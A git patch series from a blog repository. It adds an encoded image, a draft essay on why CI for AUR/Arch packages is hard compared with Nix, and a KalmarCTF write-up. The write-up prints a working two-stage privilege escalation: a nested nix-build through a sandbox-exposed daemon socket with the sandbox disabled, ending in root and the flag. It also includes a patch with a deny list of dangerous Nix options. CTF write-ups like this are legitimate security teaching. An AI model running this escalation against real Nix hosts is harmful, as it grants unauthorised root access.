zTC#s1d9I?Sw&~j1=+#%Pt4>Z*jmdrZ=+UBc$>Ez)dX~R=14?}hlV&jekan`U=6SN-0ma7ElVi>WCfTZqAj=>n63g6Z+) zpcS~FHvjdi>S|?8&6P)T-d|lUe!Xz0&x-kk$CHYSTE 
z?FKgtIy*aKuBWD^7RH7z^O@=YZ+GSAXQ2C2cAS#3EK-TvQ=z!sthcW(?ACYZzrQxk z4=8SJRFXXtm>{QS&`6CKstwCwHYUtJx({z#6wsc9-JD{IWQ?=LPo zYu>8Av!k%7zvK4|UTL!vwwhOF7$)z?`Tg;@{LU}3HWd@R|06B8G)hFMx# z=G@s)xajstX@l*Vm)pGW&oa&4@#W@?8wSqK&SJvChfDunSm-QT^}q79X1+-K&ZDU4NKUR>o4(lRnFX@%#Od$aDu|-M~@N1v&9APXGgKUu(Gns z`S|E4XplPXxtW@pTi$a=Z*A}CdQXeayuY`1^_TB%-rn7Rf4yG6NVWg;$&-n)RwV*w z_jQZw7u^ipnB=NgyZ`Su>FIX*`ugi$%h^^PIWVWiDlA zW(G~BELyyHX<3fC|Gbz-W$o?l-Dbwi*IZf`YYjT2FR*E1`1-hwvrMzQlEPC`RKkzd z`}+Fo)fPWH6POV&Yv#<8I=Z@|b^FhrIpd|m;qU94nwXdfsy1^#)#rx?2hZHP^=tL> z6Q{KzlM} zncC~i%lUWL{4AQtmz$K7)M>p1RQQ*j*j@5+QPB6LH9tRr>{;|yRZO|MHYR4ynO*ny zR4)E7na#-9c<1d`@9yqCbKro(!}AGYVbfxoKD>F8Q}+IzZP}L>fzKX3JP2x3fet1B zU66MD?~PfrX1zH(+dRgsU)K8D?5AClOX7Ez^;Va%b8b)ZI(FsMlQ>Wf#iH2qis2gL ziNN&dD}861ow8h9m{Qb zcdg8FZ<#!M@#4g*tEvdHmiyJly{D(Fg6_Te7Zp*;aq^DKIc9c;JvH z&BMzpI`3=!l@)<8R_cCpPPp~U>8@D&>+9>~LbcUrW*DyVnQ7#8Gym?LJ3A&{7M*_L z?5R^-s%mOoLQDSte!qW>-&`vZm(%V=s>x}&Me?9lP}2nUuM9ct6V{(Q7uw1tdSgxG z<{O(*PkY@Fi;aza7kTmGV)xa5_O5W6tGAnhK{(aZ#W5sgrO@tzhfNC{RE&%!Roh#< zx64#aKmS>d-6HuI&$5LJ5B~Z4cjs*_OUuZGk^iUbMlTbY`RnKutCt1xkxjCP#vN15?q7C)#CYWp~b%Z_T=TWfAX| zty^cVU%!5V!;!03r+RPSy47_0zTDf}3a?)W@t@z>S!~bJ@$uuwJGr7VGHW&{@2p7w zV{2()`>zG@U0*9W-N=}X@fdkGA&I~5Z z1ue6j>%P3Y+WmUhhYtmyp?2L{3i|r|d3kvj%h#{7Gk~_S2&?%#xORVEZM9C+77xYmW>!|SUhiV#mC`7k59)}|a^CLU~ zX;bRyO|P%7FW!3m_V)al>(;G1G;Q|zna1tA=gqY)7klcl7rX-fKw5sj{`cyvtgKV1 zpgTLK?pj~=>PqMCx7y+BbhgfWc6RpWmKK)4v`d>eZJM!pv+>^YrPCiz+Sm`t(V3at z4`eL!9;vQ0)4!#+mv{QPt=ZS>3RCW0 zUhcp1cR);xjIpWd)aqk(^UgfkxpSvity5!PAD_3c@6)XBiHF-xF7ZC2V5_h1pZ0fY zz&WN33m?u?;MllO^&N}jiDm(YyNoxOcDS5X>;ctzUZ- zXz9{dR|0RPo12@14uFWc?zQ{OU)%C`cN+KZwG|Q)V!6F`>C)EN-DQcFmUw<)`ZvjY z(#Eyy4boR+SR4Zy`~+IG3RxRu8`e$QFD&!noxOeWGoDYMKYL#(6BZVpV_z>PCMLFM z`rC&O56TvNy5fA1u_`TXnFga31L!=()2F*{i>a%tgHFF$SKC@HUv;?c)ZG5=a`~!$ zIop(fJ46Kq6{9AsTez_C>+9>u@9yj@`fIT`>2YNE$r)~sB^^Np3`7Y2BBh{>G(51p+Vr!AH8^SV(y*OM~*Bx^5)&` z?fRe+E5W~}#wNUI+oP8B`=1^i?M}T`{OXG4y5FE1=-=%MT^BRc`+29Z`o74t)6;Z8 
ztAD=Vdje`NXJlwhw=*ty;Gj3#Ebq>WFXunr-Ce%(m0A8ho4mQxrcDDC@kTFq*Zww( z-dAJ!`qI+wn0eu%lS~*^GhSKxa26=Vc3f&PY_MdA3o`gu8o9encY1RD+gn?OHiicW zPu7jv@?y1_?>w8xkl1O{rp4qMm%a*_S$cOzVYByi(E7E%prN~^#tI4xP85mjL?~!9 z-uU+R_R~w{QCl(&ruru&EVyKU9JEV0{O-D#ok~9>JNx_pr~UNw^vwDH?{ChP6@hE2 zzP|c$PFJS;na43TP)kCgBdA-h;UdGkiOoM&=G@%Wnwpw=^39F^zh1BB+P*brXVIGz z6P538(NtG&FMV?((4-bL=;i2te_w6tHBn(<<<0ZHd?`67d7yGf)z_?vPqVVKi|Y#> zoHfwvouV5(?ew%8HzJnS_w6owdup!lUZ+;BMXWDbSy^>dR9bYSwsdUGy*({6GxK8g zwt#m`5~`BmZf=tT2d5N+3?s{g!#^?~JbLov$iIKT^H=tt-n3~`(2Cx#udXIfoH+65 zEm3)S@DP;czEvw`I&M5Sy-xq+$&*H}E5E&&`C#$!PoF=hUi*FC{=Z0c+2Jf-h5&tJNHdFQKZ>*MVYeg&PA zB5jn?ai{-uup{S$9?L1LkaA~{#2SV-Y!lr5o-B8aetfL==6U=7XPB6o_wSl-p{LiE znUSG!Mva}FecFr}8l?w5zTf|!%W8hCw|95$tu39}H#$2yCPdEPw#{t%y6EkBoO!qV zzkl>Ty|?=N60Pc2S5`KqT|9i~kjwq$H4hK5>P5HIOwbBm#sgX+`1<;KdC*di+uL%b zx%v41J@NUNdwUz_y4#(?>N{R-OFb=C^}SPjCqo%yhT~x!aD%Mn%@w8%LIcA@fBxLKVuc2% zO|_yg|K1+K81v%d;=I4UvrHD2%j~yd{$S7GX3_&%7{KD#(a+bA$dEVj@k*IRYuBEA zcYpu+mQO!ECO>=p_;A?zxU0!ddEWQi zc%@mkzuo`;pZ4Z^OO~k2Ea8zh^9k6!ukP=x(6v#aQ}$iiU7oKeJ!$e}(8A=&>c@^9 zYkGZra?S+9W1x|ms_Q589x}9f9peFKW)7!w84MfP3z!`2EElV4>*?wF+?2E`(Fngg zXYSmcUvy)4g%s@enq2X|*vQBz~bhX;<1xz+#vR4!Y&Qgg??udlC%-};xFoUFW~ z?)9~`lcVCJqNF~5|DG*}KKJtdR$C57KOcHZXz+vwF3#UQq*KvUUrrRtPD z?;aiP_L7dVt@$zGx5vuB#cqW!=NKlpJt*Vl=6-xh_w~Hg;NZ*rmOK?RZL7Cw-2AzJ z+K&Lqg5qM~7<+Z~|lzB<^d0Ie+yUswuQT4z?B zEDT)$8l!i0anXoP2n`50u=V?&y?;Q9&Z^vdBoue}>c{UpvozY@-#_v6>HCvs&(=Pr z^SPOwe~OWVc(QBD!i5jje?Oc&dGgHl>-D8=t4vl0E@s>7o^t+Joy(_l*B3p6WOApS zE4dzsGZ;QOq2<@p+k3ND+I))EhFRwM^A=cvCR$>us=vR}-C+xw5MR2x=I5uFUlsl9 ze_Ql3tbg~t=*kx zR%I+IuzzI7aP!HXQ}LiezNx8cirNaHDi_iG3tCUslrKD(HB~EgM|y?4ZI#N3v)|v} z*I#k=|DVtPOL;Ej-{0qZzWk);wkNWA`jyLtSsYhvee5N`vhbV;0|$!%ivzES-1g%6 zvs~-;RDb8&TlMwOL}hocD}9fT_a}dOaWSEXQ|maaeR#0+#F;ZscC7>NS6;ewY2uR; z6Ps@3Tv*@;y7%Gx*NYb~dfiwio1?tQNKgK89_~ zCm7E9o%DV4_HCqxM~73o)#uNjZ|d*=qvRD<$Z%&hqmPdd%jk)dQIeJHQVc-rt_TKy^~o(7&5NovT`v~gXe+2H+k(K}cSQZx)2weRK+E<~v?D1JCe!*$iw`W{*nhy&6#g1YHD4JZl6Bg 
zy&ANrS3RP9bK2PmKfk^Ozc-b=jatWVm6@5z#d+xR<;$Qob~Dzm*N@(m!URNu^`5?I!UTb7^XKaq z7l6k2K$EVZ6_nR=ZrI2RFIv3V_2SvxSMHoU=O^-abNYEP8J6!aFT1DhefaR6gI7m+S;{q_ip3r>guq?ZoCIMSv+?FP#|OnVYu2P(5*8P4fAQjlKd6GL z`18ZCsJQs$LhVW?h968891mDc*&PKyTap|FY>qH}nA9QJz&I&kuc&En#gb*q9z8iZ z*(*KVGp&GKWd6~=#h*TZ2A%hEXJ;{c>gj1uwGQ97AyNJ94XDBW>GS8MyPieQyaT!# zy`5jaPN>1%-CbEtjqUxty^GmBfA07h81Qe(tY!u9Ap{B>hLv0o{5xyD2X466G|SCa z^CiRHCFvI!L0c$i7$&os<=;CK+qQPC?z6MA+wa%?_FZ+qy{+xg`Sb55E7(|BNr7sb znjAUB@;vXRPs|Me7C%$qXaa4U<8TtRVcHO*#H-Ty%Yk9q6_ZzoUteDj+WR(R#*CWa zl9G}uRu1e9YooUxx_VV~Z`IdFddUwDwQ_KA9h#~g-u3tG$;s+di(FYh`o60Znc^N? zECA^)umnzWVUAFms5Z%=R-mEnipi?8r>E<0EP8q>|KIMmHZ~q!-o&INrsU+u{EpQ= zK0O-0ysJ8YS4$*=wu?V__^|QKo1B!?R7GQB;mF8HqrbMAnw?fte|-oLn(~{eV-d*t z0_;|oK+ARO-d|q^vW08<5#bge&;eiF;`(|m{mxp@-Bi@10NOCwq;Tc!-rG{GoX@Hj z6?ob>3bYs%@*l_)NsH%Sya1Gcm`a)yIxacoGW1PK*sIOpoF&wxAacfKsiI*e7btQMKoNAk`oP(gLxoBR^Q!f!}k(J>CXEkk&bS zSPSBWCd_C2&@`(BmI|8qWf|Un_<#CgbiiZ*mO!5EAOCNDqR3FR(vzb}LBj!5mmOJt z%l%-LIfLj5PmV=bCNn*d`B$(1(;HzC$I(T+2iX4aFTXo$R*Qlc?|+Y`kCz$p7)~r! zQ-r38rU1EB3>(-lI4YfG$Ozgj&~hr6L4nC(g9{Vmo@HqWRkA${TmEV!h;|cyY|LLpaSwHm5YE|H9nqvfN5&W3bKmBOAOQMifl$gK3 zpPD@}wh^Doqt^Ms?K;t8*6{2{iF|c#mRQpdwexn|C*C(qTMdtNfuco94BjGo?fGmA zR=V)4%UpMb%NV4XFD!hfDB`eA<-@-UHyfq{+9Ky>fLsSjDlRMC*c(_I*fe7F;=eDpf6b)f z?CWyEfsJeWLi>Mj&Sx<2t2lxT1b4|<90g<^hb=wd^sT?S+?Zk46`!SDGM)$iZdLeW z*kHckW&zwYO#v3O7*^GaZK;)9niPZobTvFSVG_vem3yaOhgAt|-o!g%F} zM#Xxz10t;_U)lZN%w#$}#*=YE!=aX(PWivKjzT5-`H#gnoZ|F2s5l)CK`gsQU|?YIboFyt=akR{ E0HdwE?f?J) literal 0 HcmV?d00001 diff --git a/content/posts/packaging-is-extremely-hard/index.md b/content/posts/packaging-is-extremely-hard/index.md new file mode 100644 index 0000000..0a99540 --- /dev/null +++ b/content/posts/packaging-is-extremely-hard/index.md 
@@ -0,0 +1,256 @@ ++++ +date = "2024-01-27" +draft = true +path = "/blog/packaging-is-extremely-hard" +tags = ["build-systems", "arch-linux", "linux", "nix"] +title = "Packaging is extremely hard, or, why building AUR packages in CI is a nightmare" ++++ + +Packaging on a traditional distribution is challenging to say the least, and I +haven't seen any coherent descriptions of *why* hermetic build systems like Nix +eliminate an entire category of needing to think about certain things. Recently +a friend mentioned she was considering setting up a CI service for some AUR +packages by a trivial cron job, whereas my reaction to the idea of CI for Arch +packages is "that would take a month of work to do correctly". + +Let's explore the inherent complexity in writing a CI service for basically any +binary distro; picking on Arch Linux is only because it is what I have +experience with, though they tend to be especially fast and loose with inherent +complexity. One could argue that Arch in particular is the Go of distros, since +it ignores a lot of hard things in order to ship a working distro, similarly to +[how Go famously solves complexity by ignoring it][golang]. This is not about +factionalism; it is about the choices of where distro maintainers have spent +their energy, and ignoring complexity is something that has its place. + +Arch is known for having a large user maintained repository of non-reviewed +community-written packaging for most anything under the sun called the AUR. +This is a blessing and a curse, because Arch is extremely a binary distro. +Pretty much this entire post would apply to anyone maintaining a binary +repository for another distribution, except perhaps the part of building +packages maintained by other people in CI. 
+ +[golang]: https://fasterthanli.me/articles/i-want-off-mr-golangs-wild-ride + +[rebuild-conds]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#The_workflow +[rebuild-detector]: https://github.com/maximbaz/rebuild-detector + +## "Rebuild conditions are indeterminate", or, why C++ people are always talking about ABI + +If you are a downstream consumer of an official binary package, such as being +an AUR packager, there is not really any obvious notice that you should rebuild +your package due to dependency updates, besides, perhaps, [rebuild-detector] +and upgrading your system regularly. + +The way that release management is done at Arch Linux is that maintainers +updating libraries go and [ping all their colleagues][soname-bump] when their +upstream changed their software so it is no longer binary-compatible +("ABI-compatible"), represented by a "soname bump", e.g. changing the file name +`libc.so.5` -> `libc.so.6`. This is not terribly unusual among distros. + +However, it's perfectly possible that packages break their ABI without updating +their soname, since most changes to C header files besides adding things will +break ABI in theory, for instance, changing `#define` constants or other such +things. So, if upstream is being impolite, they can cause bugs at any time, and +blatant changes can be caught by things like [abi-checker], though they don't +necessarily form part of the official process for Arch. + +[abi-checker]: https://lvc.github.io/abi-compliance-checker/ + +[soname-bump]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#Run_sogrep_on_identified_soname_change + +When packages are rebuilt without being updated, this is done by incrementing +`pkgrel` in the PKGBUILD, which is achieved automatically in the official repos +with `pkgctl build --rebuild` ([man page][pkgctl-build]) of the affected +packages. 
For example, for a version `0.20.10-1`, incrementing `pkgrel` would +produce a version `0.20.10-2`, which is uploaded to staging as well as pushed +to the package's own Git repo with `pkgctl release`. + +After all the builds are made, `pkgctl db move` is invoked to move all the +packages over. + +

+ +[pkgctl-build]: https://man.archlinux.org/man/pkgctl-build.1.en + +### Atomicity? Is that like a criticality incident? + +{% image(name="./antifa-demon-core.png", colocated=true) %} +an antifaschistische aktion sticker with a demon core in the middle, +"ausgerutscht, trotzdem da" on top and "kernphysiker antifa" on the bottom +{% end %} + + + +If the official repos operate by coordination between all the packagers, with a +staging area to atomically release rebuilds, it follows that AUR packagers can +expect that official repos can and will change at any time without notification +(unless one goes and looks at the development bug tracker). + + + +[arch-arm]: https://wiki.archlinux.org/title/Arch_Linux_Archive + +This is a relatively reasonable process for a distro that doesn't fully +automate everything and even one that does, but it is kind of a problem if you +aren't an official maintainer working in the official repos, since you aren't +in the notification list. + +Note also that the information that the AUR itself has on packages is not +sufficient to send emails about this either; this isn't the fault of the +Arch developers. + +However, the upshot of this is that if one is using an AUR package maintained +by someone else, there is no guarantee anyone has tried building it against the +latest versions of the official repos, and it is in fact also impossible to +know what versions it was successfully built against. A local build of an AUR +package can get arbitrarily out of sync with the official repos and it is not +easily possible to reconstruct the state of all the repos that went into +building it. + +Stuff randomly breaking due to repositories using the time of day as a software +version pinning mechanism is not just an AUR problem: it is much, much worse on +third-party binary repositories. 
For instance, even though [archzfs] is by far +one of the best executed third party repositories, in large part on account of +them running a CI service, it still can be out of time with the versions of the +kernel. + +[archzfs]: https://github.com/archzfs/archzfs + +However, the instance where third party repositories get *really* out of sync +with things is for things like Manjaro which have repositories delayed by two +weeks relative to Arch for "stability". This doesn't work out very well. + +## The source-build-source cycle + +For any package, a CI system that fully automates the packaging workflow needs +to be able to increment `pkgrel` on any dependency updates and trigger a +rebuild automatically. This is stored in the package source files: the CI +system has to be able to push to the sources automatically. + +This also means that a CI system building someone else's AUR packages needs to +*fork any packages it builds*, since it must be able to update `pkgrel` based +on its own detection of upstream changes, without worrying about the AUR +maintainer doing it. + +### Building someone else's stuff? Better reconcile it with automated local changes automatically + +However, the even worse corrolary of the above is if the other maintainer +*does* update `pkgrel`, since then you have to reconcile your own maintained +`pkgrel` and ensure that it strictly increases even with the maintainer's +changes. + +Another cause of needing to rebuild AUR sourced packages is the AUR package +itself changing, perhaps because upstream updated it and the AUR packager +updated their packaging. In that case, one has to discard local changes and +hope that versions strictly increased so pacman will install the new one. + +## Weightless! In the package manager! Loopy dependency graphs + +Debian ([documentedly so][debian-loopy]) and most other binary distros don't +have any tooling preventing packages forming circular build dependency graphs. 
+The most trivial one that exists in most any binary distribution is the C++ +compiler, which is itself likely a build dependency of the C++ compiler since +both clang and gcc are written in C++. + +How does one get the first compiler? In most distros, the answer is +"someone built it manually from somewhere and shoved it in /usr/local and then +built the first compiler package using some crimes". However, that path is, for +the most part, not documented or clearly reproducible. It is the typical state +of affairs to have the *distro repository itself* be a ball of inscrutable +mutable state. + +In NixOS it's [a tarball of compilers that's built with Nix and is occasionally +updated][nixos-bootstrap-tools], and will in the future [be rooted in a 256 +byte binary][nixos-minimal-bootstrap] after which everything is built from +source, which is what Guix also does. There's a bunch more information about +the efforts to bootstrap from nearly nothing at [bootstrappable.org], as well +as [on the Guix blog][fsb]. + +[bootstrappable.org]: https://bootstrappable.org/ + +[fsb]: https://guix.gnu.org/en/blog/2023/the-full-source-bootstrap-building-from-source-all-the-way-down/ +[nixos-bootstrap-tools]: https://github.com/nixos/nixpkgs/blob/d0efa70d8114756ca5aeb875b7f3cf6d61543d62/pkgs/stdenv/linux/make-bootstrap-tools.nix#L237-L256 +[nixos-minimal-bootstrap]: https://github.com/nixos/nixpkgs/blob/3dcd819caa03c848a9a06964857e12e4b789239e/pkgs/os-specific/linux/minimal-bootstrap/default.nix + +[debian-loopy]: https://wiki.debian.org/CircularBuildDependencies + +## Package tests? p--package integration t-tests?? + +So you want to write an integration test for your package on Arch Linux. That's +too bad, because there's not a testing framework, because there are not tests. +Packages can run the software's testsuite, but there is no officially supported +integration testing solution. 
+ +# Software engineering fixes this + +I have spilled a thousand words on how traditional binary distros (that [are +not Fedora][fedora-ci]) spend a significant amount of labour doing rebuilds +largely by hand, with scripts on their local machines, coordinating amongst +maintainers. Most packages are built on developer machines, though [never on +Fedora][fedora-ci2] and only [sometimes on Debian][debian-ci], and thus cannot +necessarily be trusted to not be contaminated by the squishy mutable stuff that +happens on dev machines. Even though they are typically built in chroots, the +environment is not controlled. + +[debian-ci]: https://ci.debian.net/ + +I have addressed how packages require manually poking `pkgrel` every time a +rebuild is necessary, and how the need for rebuilds affects downstream +builders. This is, incidentally, [largely still true on +Fedora][fedora-updates]. + +The (pessimistic but sound) way to manage rebuilds is to just recompile every +downstream when a single bit of any dependency changes. This is the approach +used by Nix and it trades a significant but not unaffordably large (for a big +distro) amount of computer time in a build cluster for not having to think +about any of this. ABI breaks cannot affect the distribution because everything +was built against the exact same libraries, together. + +A Nix-like hermetic build system doesn't have a concept of `pkgrel`, because +packages are just what is in the single monorepo source tree on a given commit. +There is nothing wrong with the other approach of multiple repositories and +repository metadata that doesn't expose a single history, but it would be +useful to be able to cleanly ensure that a group of machines have exactly the +same packages on them as of some epoch, say. + +Facebook has made a tool for RPM distributions that builds OS images with +Buck2, called [Antlir]. 
This takes snapshots of repositories and builds OS +images with a hermetic build system, such that they receive the exact same +result every time. + +[Antlir]: https://facebookincubator.github.io/antlir/docs/ + +ABI breaks can *also* not break downstream consumers of `nixpkgs`, because Nix +builds out-of-tree stuff exactly the same using the same version set as +anything else: unlike every binary distribution, the distribution packages are +not special, and building out-of-tree stuff will never randomly break due to +ABI changes. + +NixOS has a robust and widely used (1040 of them) [integration +test][nixos-integration-tests] system, like Fedora, testing most parts of the +system and [gating repository updates][nixos-gating] like Fedora Bodhi. + +[nixos-gating]: https://status.nixos.org/ +[nixos-integration-tests]: https://nix.dev/tutorials/nixos/integration-testing-using-virtual-machines.html +[fedora-updates]: https://docs.fedoraproject.org/en-US/fesco/Updates_Policy/ +[fedora-ci2]: https://discussion.fedoraproject.org/t/report-from-the-reproducible-builds-hackfest-during-flock-2023/87469 +[fedora-ci]: https://docs.fedoraproject.org/en-US/ci/ From c12a6dd830460406440ab94184c6fd2d6307826c Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Mon, 18 Mar 2024 13:39:01 -0700 Subject: [PATCH 06/10] reproducible pwning --- content/posts/reproducible-pwning-writeup.md | 295 +++++++++++++++++++ 1 file changed, 295 insertions(+) create mode 100644 content/posts/reproducible-pwning-writeup.md diff --git a/content/posts/reproducible-pwning-writeup.md b/content/posts/reproducible-pwning-writeup.md new file mode 100644 index 0000000..12a402c --- /dev/null +++ b/content/posts/reproducible-pwning-writeup.md 
@@ -0,0 +1,295 @@ ++++ +date = "2024-03-16" +draft = false +path = "/blog/reproducible-pwning-writeup" +tags = ["ctf", "nix"] +title = "KalmarCTF: Reproducible Pwning writeup" ++++ + +I was making memes in the CTF room until someone told me Nix showed up +on a CTF, and well. It doesn't take that much to tempt me. + +Reproducible Pwning is a challenge written by +[niko](https://hachyderm.io/@nrab), which involves a NixOS VM you're supposed +to root. The build user is not notably privileged. + +There is a flag in `/data` which is mounted from the host via some means. That +directory is only readable by root. + +There is a patch to the Nix evaluator. Interesting: + +```patch +diff --git a/src/libutil/config.cc b/src/libutil/config.cc +index 37f5b50c7..fd824ee03 100644 +--- a/src/libutil/config.cc ++++ b/src/libutil/config.cc +@@ -1,3 +1,4 @@ ++#include "logging.hh" + #include "config.hh" + #include "args.hh" + #include "abstract-setting-to-json.hh" +@@ -17,6 +18,16 @@ Config::Config(StringMap initials) + + bool Config::set(const std::string & name, const std::string & value) + { ++ if (name.find("build-hook") != std::string::npos ++ || name == "accept-flake-config" ++ || name == "allow-new-privileges" ++ || name == "impure-env") { ++ logWarning({ ++ .msg = hintfmt("Option '%1%' is too dangerous, skipping.", name) ++ }); ++ return true; ++ } ++ + bool append = false; + auto i = _settings.find(name); + if (i == _settings.end()) { +``` + +The machine is configured with the following NixOS module, which I pulled out +of the included flake. The rest of the flake is normal stuff. 
There are a few +things that stand out to me: + +- sudo is disabled, polkit is disabled: we are probably not looking for some + setuid exploit +- There are some *extremely* nonstandard Nix config settings being applied + +```nix +({pkgs, ...}: { + nixpkgs.hostPlatform = "x86_64-linux"; + nixpkgs.overlays = [ + (final: prev: { + # JADE: likely vulnerable to puck's CVE, but I doubt that is the bug cuz they + # added a patch and there is other funny business up. + nix = final.nixVersions.nix_2_13.overrideAttrs { + patches = [./nix.patch]; + # JADE: due to broken integration tests, almost certainly + doInstallCheck = false; + }; + }) + ]; + + # JADE: no interesting setuid binaries + security = { + sudo.enable = false; + polkit.enable = false; + }; + + systemd.services.nix-daemon.serviceConfig.EnvironmentFile = let + # JADE: here is the wacky part of the config. + # This exposes the Nix daemon socket inside the sandbox (this is mostly + # never the case unless using recursive-nix). So we are going to + # be running a nix build inside a nix build to do something. + sandbox = pkgs.writeText "nix-daemon-config" '' + extra-sandbox-paths = /tmp/daemon=/nix/var/nix/daemon-socket/socket + ''; + # JADE: I don't know what this does, so we are going to be reading some C++Nix + # source code. But it sure smells like running the build as root. + buildug = pkgs.writeText "nix-daemon-config" '' + build-users-group = + ''; + in + # JADE: Sets additional config files to only the nix daemon. This is + # documented in the Nix manual. + pkgs.writeText "env" '' + NIX_USER_CONF_FILES=${sandbox}:${buildug} + ''; +}) +``` + +Here is the rest of the module which is uninteresting: + +{% codesample(desc="`boring-module.nix`") %} +```nix +{ ... }: { + # JADE: what the heck is this? It seems like some kind of kernel-problems + # storage thing. Later found out this is nothing. 
+ environment.etc."systemd/pstore.conf".text = '' + [PStore] + Unlink=no + ''; + + users.users.root.initialHashedPassword = "x"; + users.users.user = { + isNormalUser = true; + initialHashedPassword = ""; + group = "user"; + }; + users.groups.user = {}; + + system.stateVersion = "22.04"; + + services.openssh = { + enable = true; + settings.PermitRootLogin = "no"; + }; + + # JADE: save some image size + environment.noXlibs = true; + documentation.man.enable = false; + documentation.doc.enable = false; + fonts.fontconfig.enable = false; + + nix.settings = { + # JADE: this option has no interesting security impact, just whether you + # can build during evaluation phase. + allow-import-from-derivation = false; + experimental-features = ["flakes" "nix-command" "repl-flake" "no-url-literals"]; + }; +} +``` +{% end %} + +So, to sum up: +- We have a Nix daemon socket in the sandbox. +- We are running builds with some weird group. +- Several config settings that make trusted users effectively root are + blocked by the patch. Interesting. We probably become a trusted user then. + +So like, let's run some build. + +```nix +let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a +'' +``` + +This gives me: + +``` +this derivation will be built: + /nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv +building '/nix/store/958afc87nsfhwlm6b62z2xksmlaawsqg-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +``` + +Hm. Boring, I was expecting to be root already. + +But, why is there a socket in there? Let's try invoking another build inside +our build, maybe? 
And, based on the assumption we must be trusted user (since I +can't think of any other reason interaction with the bind-mounted socket would +be different from inside the sandbox), let's try just turning off the sandbox +in the inner build and see what happens? + +```nix +let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; + # dont worry about the contents quite yet + hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix); +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a + nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax} +'' +``` + +and `stage2.nix`: + +```nix +let + pkgs = import (builtins.getEnv "PKGS") { }; +in +pkgs.runCommand "meow2" { } '' + echo MEOW2 + id -a +'' +``` + +This outputs: + +``` +this derivation will be built: + /nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv +building '/nix/store/iynjhk5a5ymp26cbyp22l15ix4lrp2f6-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +this derivation will be built: + /nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv +building '/nix/store/cyw7kaqazdpgpna0jmaw7cw5348srvv3-meow2.drv'... +MEOW2 +uid=0(root) gid=0(root) groups=0(root) +``` + +Welp, I am root. 
Change stage 2 to `cat /data/*` and we have a flag: + +``` +[user@nixos:~]$ cat >stage1.nix <<-'EOF' +> let + nixpkgs = builtins.fetchTarball { + url = "https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; + hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix); +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a + nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax} +'' +> EOF + +[user@nixos:~]$ cat >stage2.nix <<-'EOF' +> let + pkgs = import (builtins.getEnv "PKGS") { }; +in +pkgs.runCommand "meow2" { } '' + echo MEOW2 + id -a + ls / || true + ls /data || true + cat /data/* +'' +> EOF + +[user@nixos:~]$ nix-build stage1.nix +warning: Nix search path entry '/nix/var/nix/profiles/per-user/root/channels' does not exist, ignoring +these 2 derivations will be built: + /nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv + /nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv +these 11 paths will be fetched (3.92 MiB download, 23.41 MiB unpacked): + +building '/nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv'... +warning: Option 'accept-flake-config' is too dangerous, skipping. +warning: Option 'allow-new-privileges' is too dangerous, skipping. +warning: Option 'build-hook' is too dangerous, skipping. +warning: Option 'post-build-hook' is too dangerous, skipping. +warning: Option 'pre-build-hook' is too dangerous, skipping. +building '/nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +this derivation will be built: + /nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv +warning: Option 'accept-flake-config' is too dangerous, skipping. +warning: Option 'allow-new-privileges' is too dangerous, skipping. 
+warning: Option 'build-hook' is too dangerous, skipping. +warning: Option 'post-build-hook' is too dangerous, skipping. +warning: Option 'pre-build-hook' is too dangerous, skipping. +building '/nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv'... +MEOW2 +uid=0(root) gid=0(root) groups=0(root) +bin dev home lib64 proc run sys usr +data etc lib nix root srv tmp var +flag +kalmar{0nlyReproduc1bleMisconfigurationsH3R3} +``` + +I was informed later that I found an unintended solution, and one was not +supposed to "simply set `sandbox = false`". The intended solution was to either +use the `diff-hook` setting which is run as the daemon's user (like +`post-build-hook` and `build-hook` which were conspicuously also banned), or +abuse being root to tamper with the inputs to the derivation and overwriting +something run by a privileged user. + +I don't think the unintended solution was that bad, though, because once you +are trusted user, it is assumed in the Nix codebase that you can just root the +box. From 20934137a63b77ece9d513dbf0ff752dd84c8572 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Mon, 8 Apr 2024 19:41:25 -0700 Subject: [PATCH 07/10] update flakes arent real --- content/posts/flakes-arent-real.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/content/posts/flakes-arent-real.md b/content/posts/flakes-arent-real.md index 01df387..5d0ceb3 100644 --- a/content/posts/flakes-arent-real.md 